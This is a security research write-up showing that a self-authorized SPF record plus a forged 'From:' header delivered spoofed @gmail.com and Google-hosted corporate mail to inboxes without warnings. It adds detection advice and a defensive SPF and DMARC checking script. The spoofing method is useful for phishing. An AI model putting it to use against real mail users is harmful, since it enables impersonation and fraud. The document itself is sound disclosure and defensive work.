To make it clear, let’s look at a very basic sample of an SMTP transaction in Figure 1.

Figure 1: Simple SMTP transaction sample

Note that the “From:” header is part of the message content and is normally equivalent to the value used in the SMTP command “mail from:”, but not necessarily. Its value can be freely specified by the system or person issuing commands to the SMTP server. Using the same sample, but now spoofing the message sender, it would be enough to change the “From:” header to the desired value, as seen in Figure 2.

Figure 2: A sample SMTP transaction with a spoofed sender

In this case, the message delivered to recipient@domain.com will look like it has been sent by SpoofedSender@anydomain.com rather than sender@domain.com. This opens space for message impersonation or sender spoofing. And this is exactly the way it is done by cybercriminals or fraudsters to trick their victims into clicking on malicious links, for example.

Note that by using this kind of impersonation, if the recipient replies to the message, the reply will be delivered to the spoofed address. For the example above, it would be delivered to SpoofedSender@anydomain.com.

It turns out that changing the “From:” header to the desired value will almost certainly trigger the recipient’s mail server anti-spam or anti-phishing filters to reject or quarantine the message. If the message bypasses those filters, it will depend on the recipient to detect that the message was forged by analyzing the message headers.

Trying to avoid those filters, some spammers configure ad-hoc mail servers in a way to send spoofed messages on behalf of a certain domain by changing both the “Mail from:” SMTP command and the “From:” header to the desired value. This spoofing strategy can be combated by the owners of the Internet domain by applying spoofing protection mechanisms, like SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (Domain-based Message Authentication, Reporting and Conformance). By using SPF, for example, you can specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of your domain. Once this policy is established, it will be up to the recipient’s mail server to check the policy and reject messages coming from non-authorized servers.

3. Experiments

After some basic concepts on the SMTP protocol and how e-mail spoofing occurs, it’s time to check the resilience of Gmail and Yahoo against mail spoofing. We are going to impersonate the “From:” message header value. The “Mail from:” SMTP command will be issued using an address of a generic domain owned by us.

For the experiments, we created a very simple scenario:

For the source of the spoofed messages, we used a generic “.com” domain owned by us and registered roughly a year ago that has not been used to host content nor to send e-mail;
For the mail server, we hired and configured a Linux server at Amazon EC2 with minimum resources running a Postfix default installation with the address *.*.123.26;
The accounts in Gmail and Yahoo we are going to use as recipients and senders of the spoofed messages were created for the experiments. They are: temporaryrecipient@gmail.com, temporaryrecipient@yahoo.com, temporarysender@gmail.com and temporarysender@yahoo.com;
All the tests were done by connecting directly to our SMTP server (port 25) and issuing SMTP commands manually to make it easy to collect the evidence for this report.
Let’s get started.

3.1. Trying to spoof without SPF

In this experiment, we are going to try this scenario:

Try to impersonate Gmail and Yahoo accounts by sending spoofed messages to the respective provider’s recipients, i.e.: temporarysender@gmail.com to temporaryrecipient@gmail.com and temporarysender@yahoo.com to temporaryrecipient@yahoo.com.
The SMTP server’s IP address is not allowed by the SPF policy of our generic “.com” domain to send e-mails on behalf of it, as seen in Figure 3.

Figure 3: No SPF policy associated to the experiment domain

3.1.1. Trying to spoof a Gmail to Gmail message

This experiment consisted of sending an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. Note that email@our-generic-domain.com was set as the “Mail from:” SMTP parameter while the “From:” header was set to the forged value temporarysender@gmail.com, as seen in Figure 4.

Figure 4 – Trying to spoof Gmail to Gmail message with no SPF policy

As the result of this experiment (Figure 5), the Gmail servers rejected our spoofed message (ID: 7A14D2452C) with the error code 421-4.7.0 followed by the message “To protect our users from spam, mail sent from your IP address has been temporarily rate limited.” We can also see the error 421-4.7.0 and the message “Our system has detected that this message is suspicious due to the very low reputation of the sending IP address.”

Figure 5 – Gmail servers rejecting the spoofed message

3.1.2. Trying to spoof a Yahoo to Yahoo message

Now, let’s see what happened in the Yahoo spoofing scenario. Similarly to the Gmail scenario, we tried to send a message to temporaryrecipient@yahoo.com pretending it to be from temporarysender@yahoo.com, as seen in Figure 6.

Figure 6 – Trying to spoof Gmail to Gmail message with no SPF policy

As the result of this experiment, we verified that our Postfix mail server couldn’t deliver the message (ID 4259245CE). The error 421-4.7.0 followed by the message “suspicious due to the very low reputation of the sending IP address” was triggered, as seen in Figure 7.

Figure 7: Mail rejected by Yahoo servers during the spoofed message delivery

3.2. Trying to spoof with SPF

In this experiment, we are going to try this scenario:

Try to impersonate Gmail and Yahoo accounts by sending spoofed messages to the respective provider’s recipients, the same as in the previous experiment.
Configure our domain’s SPF policy to allow our SMTP server to send e-mail on behalf of it, as seen in Figure 8. Our intention is to verify whether this configuration, besides being a kind of self-authorization, could interfere with the Gmail and Yahoo anti-spoofing filters.

Figure 8: SPF policy allowing our SMTP Server

3.2.1. Trying to spoof a Gmail to Gmail message

As in the previous experiment, we try to send an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. In Figure 9, you can see the commands issued to our SMTP server in order to send the spoofed message.

Figure 9: Spoofing Gmail to Gmail with SPF policy allowing our SMTP server

In Figure 10, you can see the logs from our SMTP server while delivering the message (ID EBE852452C) to Gmail servers.

Figure 10 – SMTP logs

Unlike what happened when the SPF policy wasn’t authorizing our SMTP server, this time the Gmail servers accepted our message delivery. It remained to be seen whether the message was tagged as SPAM or something similar. To our surprise, the message was delivered to the recipient’s inbox folder, as seen in Figure 11.

Figure 11 – Spoofed message in the recipient’s inbox folder

As you can see in Figure 12, by opening the message, the only detail that may draw the user’s attention to a suspicious “non-Gmail” message is the “via our-generic-domain.com” near the sender’s address. As it’s not an alert and it doesn’t have any warning sign, users may not pay enough attention to this detail and believe the message is legit. It’s important to note that if the user receives this message in the iOS mobile app, this detail does not even appear, as shown in Figure 13. The Gmail app for Android offers users the option to see the security details of the message.

Figure 12 – Spoofed message in the Gmail Web app

Figure 13 – The spoofed message seen from the Gmail iPhone mobile app

By observing the message headers, in Figure 14, we can see that the SPF check passed and, despite the unsuccessful DMARC check, the e-mail was properly delivered to the inbox folder of the recipient. Technically speaking, the DMARC test depends on the SPF and DKIM tests. If both tests return OK, DMARC will PASS. [3]

Similarly to SPF, DMARC is a configuration done at the DNS zone level that informs the recipient’s e-mail server what it should do with a message that does not comply with the policy: “reject” to drop the message, “quarantine” to isolate the message, or “none” to inform that the message should be delivered.

Figure 15: Spoofing Yahoo to Yahoo with SPF polity SMTP transaction

Unlike Gmail, Yahoo rejected our spoofed message during the SMTP transaction with the error 554 5.7.9 followed by the message “Message not accepted for policy reasons.” It is not clear, but the message was probably blocked because of the @yahoo.com e-mail address in the “From:” message header sent from a non-Yahoo server.

Figure 16 – Spoofed message rejected by Yahoo servers

3.3. Trying to spoof messages between corporate domains hosted by Google Apps

Given that we had success spoofing messages between @gmail.com accounts, we became curious whether the same strategy would work for corporate domains hosted by Google. For this scenario we had help from two companies that host their e-mail with Google and tried to send a spoofed message between user accounts.

The same steps from section 3.2.1 (spoofing Gmail to Gmail with SPF) were used. This more sensitive scenario produced concerning results. Not only was the message delivered without security warnings to the recipient’s inbox folder, but it also showed the spoofed account’s profile picture.

3.4. Extra findings

During our experiments, we found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exist in the Gmail user base.

In this situation, unlike the successful scenarios, Gmail forwarded the message to the Spam folder and added a special security alert informing that it could not verify whether the message was really sent by gmail.com, as seen in Figure 17.

Figure 17 – Behavior when the spoofed sender is a non-existing Gmail account

Take a look at the same message in the Gmail app for iOS in Figure 18. Beyond the alert, it shows a fish hook icon as an allusion to a phishing attack.

Figure 18 – Spoofed message on Google mobile app for iOS

Another interesting finding is related to the spoofed sender’s avatar. Google loads the real profile image associated with the spoofed e-mail address, which increases the perception of legitimacy by the message recipient, as seen in Figure 19.

Figure 19 – Spoofed sender profile picture

4. How to identify Gmail spoofed messages

Given that the spoofed message is delivered to your inbox without a security warning, may have been flagged as important, shows the picture associated with the spoofed e-mail address and may not show that the message was sent through a non-Google server, what can a user do to protect themselves?

In this section, we give advice on how users may identify Gmail spoofed messages and avoid risks.

4.1. Examine message details on Gmail

Be aware of messages in your inbox coming from “@gmail.com” via other servers or domains. Normally, @gmail.com messages are delivered directly from the Gmail servers. Unfortunately, the “via” tag is available only in the Gmail Web application. In the mobile (Android and iOS) apps this information is not present, making it harder to identify fake messages.

Additionally, you may take a look at the message details. This feature is available in the Gmail Web application by clicking on the “down-arrow” near “to me”, as in Figure 20.

Figure 20 – Examining message details

4.2. Examine message source

By examining the message details, you may notice the first signs of a spoofed message, but only by examining the full message headers can you be sure about it.

You can access the message source by clicking on the drop-down button near the “reply” button in the Gmail Web application and choosing the “Show original” option, as seen in Figure 21.

Figure 21 – Opening message source/original

Note that the value of the “Return-Path” field in the message headers is an address of a non-Gmail domain. The value in this field is exactly the same one used in the “Mail from:” SMTP command when we forged this message.

So, be suspicious of Gmail messages you receive with an improper address in this field, as seen in Figure 22.

Figure 22 – Observing the message source

It is worth noting that, as Gmail marks messages with the “via” tag, there are obviously situations in which the message was sent by another mail server and yet is legit. Thus, not all messages marked with the “via” tag are malicious.
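The SPF-pass-but-DMARC-fail combination described in section 3.2.1, and the Return-Path check described above, as an added example that is not part of the original article nor Morphus Labs’ code: a minimal SPF evaluator plus a strict-alignment check run over a constructed message mirroring the experiment. The SPF record, the sending IP (documentation address 203.0.113.26, standing in for the elided *.*.123.26) and the DNS lookup table are assumptions; DKIM is assumed absent (Postfix default install), so DMARC rests on SPF alignment alone.

```python
import ipaddress
from email import message_from_string
from email.policy import default
from email.utils import parseaddr

# Constructed stand-in for DNS TXT lookups (assumption: only our domain publishes SPF).
DNS_SPF = {"our-generic-domain.com": "v=spf1 ip4:203.0.113.26 -all"}

# Constructed message as the recipient would see it in "Show original": the
# Return-Path carries the envelope sender from "Mail from:", the From header is forged.
SPOOFED_MESSAGE = """Return-Path: <email@our-generic-domain.com>
From: temporarysender@gmail.com
To: temporaryrecipient@gmail.com
Subject: test

hello
"""


def spf_check(sender_ip, txt_record):
    """Minimal SPF evaluator: supports ip4:/ip6: mechanisms and 'all' only
    (assumption: no include/redirect/mx/a). Returns the SPF result string."""
    ip = ipaddress.ip_address(sender_ip)
    terms = txt_record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"  # no policy published for this domain
    results = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
    for term in terms[1:]:
        qualifier = "+"  # default qualifier per RFC 7208
        if term[0] in results:
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            return results[qualifier]
        if term.lower().startswith(("ip4:", "ip6:")):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return results[qualifier]
    return "neutral"  # no mechanism matched and no 'all' present


def evaluate_message(raw_message, sender_ip, dns_spf):
    """Check SPF on the envelope (Return-Path) domain and strict DMARC alignment
    against the header From domain; flag @gmail.com senders that do not align."""
    msg = message_from_string(raw_message, policy=default)
    header_domain = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    envelope_domain = parseaddr(str(msg.get("Return-Path", "")))[1].rpartition("@")[2].lower()
    spf = spf_check(sender_ip, dns_spf.get(envelope_domain, ""))
    # Strict alignment: the SPF-authenticated domain must equal the From domain.
    aligned = spf == "pass" and envelope_domain == header_domain
    return {"spf": spf, "spf_domain": envelope_domain, "from_domain": header_domain,
            "dmarc_spf_aligned": aligned,
            "suspicious": header_domain == "gmail.com" and not aligned}


if __name__ == "__main__":
    print(evaluate_message(SPOOFED_MESSAGE, "203.0.113.26", DNS_SPF))
```

The result reproduces the headers in Figure 14: SPF passes for our-generic-domain.com, yet the message fails alignment because that is not the domain shown in From, which is exactly the mismatch the Return-Path check exposes.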

4.3. Report malicious or spam messages to Gmail

Finally, as you identify malicious or spoofed messages, report them to Gmail. By doing this, you will help Gmail improve its message filters. The report spam/phishing functions are available on the drop-down button near the “reply” button in the Gmail Web application.

5. Final considerations

As we can see, if you have a “self-authorized” e-mail server in your own domain’s SPF policy, you can deliver spoofed messages pretending to be from any existing @gmail.com address to the inbox folder of any other @gmail.com account with no security warning.

As per the results of section 3.3, it was also possible to spoof messages between corporate domains hosted by Google Apps. Beyond the malicious actions that may target a regular Gmail account, this possibility may put entire businesses at risk.

We privately contacted the Google Security team, informing them of the possibilities we found and the potential impact on users. They gave us rapid feedback informing that our submission won’t be tracked as a security bug.

Although it has not been considered a security bug, in our opinion it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account. The alerts used in that case could protect users from a variety of malicious actions. Additionally, we suggest adding the possibility to view message security details within the Gmail iOS app, as today users have no option to verify whether they are being spoofed.

It’s worth mentioning that, as per our experiments, Yahoo rejected spoofed messages in both cases. We didn’t document Outlook.com tests, but the spoofed messages we tried to send were forwarded to the recipient’s SPAM folder.

As this can be used by cybercriminals or fraudsters to make victims among Gmail users, we decided to publish this article to make people aware of this possibility so they can protect themselves.